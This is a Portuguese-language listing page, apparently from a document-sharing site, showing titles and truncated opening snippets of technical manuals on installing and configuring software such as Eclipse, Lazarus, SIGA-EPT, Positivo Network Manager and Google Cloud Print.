DIRETORIA DE TECNOLOGIA E SISTEMAS CENTRO DE TECNOLOGIA EM SISTEMAS Manual de Configuração do Alferes 7 1 Sumário 1. Configurando o Alferes 7.0 na Rede...3 2. Senha de Root.... 4 3. Configurando o Alferes
Leia maisMANUAL DE INSTALAÇÃO CONFIGURAÇÃO IDE ECLIPSE
MANUAL DE INSTALAÇÃO E CONFIGURAÇÃO IDE ECLIPSE T1011 GUILHERME RODRIGUES Ano 2015 MANUAL DE INSTALAÇÃO E CONFIGURAÇÃO DA IDE ECLIPSE. Neste documento aborda como instalar e configurar a IDE eclipse para
Leia maisTUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH!
UNIVERSIDADE DE SÃO PAULO (USP) ESCOLA DE ARTES, CIÊNCIAS E HUMANIDADES (EACH) TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH! Autoria e revisão por: PET Sistemas
Leia maisInstalando o Lazarus e outros sistemas de suporte. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011
Instalando o Lazarus e outros sistemas de suporte Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011 Edição 1 Levante e ande - Instalando o Lazarus e outros sistemas de suporte. Ano: 02/2011 Nesta Edição
Leia maisIntrodução ao Sistema. Características
Introdução ao Sistema O sistema Provinha Brasil foi desenvolvido com o intuito de cadastrar as resposta da avaliação que é sugerida pelo MEC e que possui o mesmo nome do sistema. Após a digitação, os dados
Leia maisIMPORTANTE: O PNM4R2 não entra em estado funcional enquanto o Windows não
Manual Instalação Positivo Network Manager Versão 4R2 para Integradores O produto Positivo Network Manager Versão 4R2 (PNM4R2) consiste de uma plataforma do tipo cliente servidor, sendo o cliente, os microcomputadores
Leia maisManual de Instalação. Instalação via apt-get
Manual de Instalação Instalação via apt-get Projeto SIGA-EPT Manual de Instalação Instalação via apt-get SISTEMA INTEGRADO DE GESTÃO ACADÊMICA Versão outubro/2010 Sumário 1 Introdução 2 2 Pré-requisitos
Leia maisPrática NAT/Proxy. Edgard Jamhour. Esses exercícios devem ser executados através do servidor de máquinas virtuais: espec.ppgia.pucpr.
Prática NAT/Proxy Edgard Jamhour Exercícios práticos sobre NAT e Proxy, usando Linux. Esses exercícios devem ser executados através do servidor de máquinas virtuais:.ppgia.pucpr.br OBS. Esse roteiro utiliza
Leia maisGuia para o Google Cloud Print
Guia para o Google Cloud Print Versão 0 BRA Definições das observações Utilizamos o estilo de observação a seguir ao longo deste manual do usuário: ensina como agir em determinada situação ou fornece dicas
Leia mais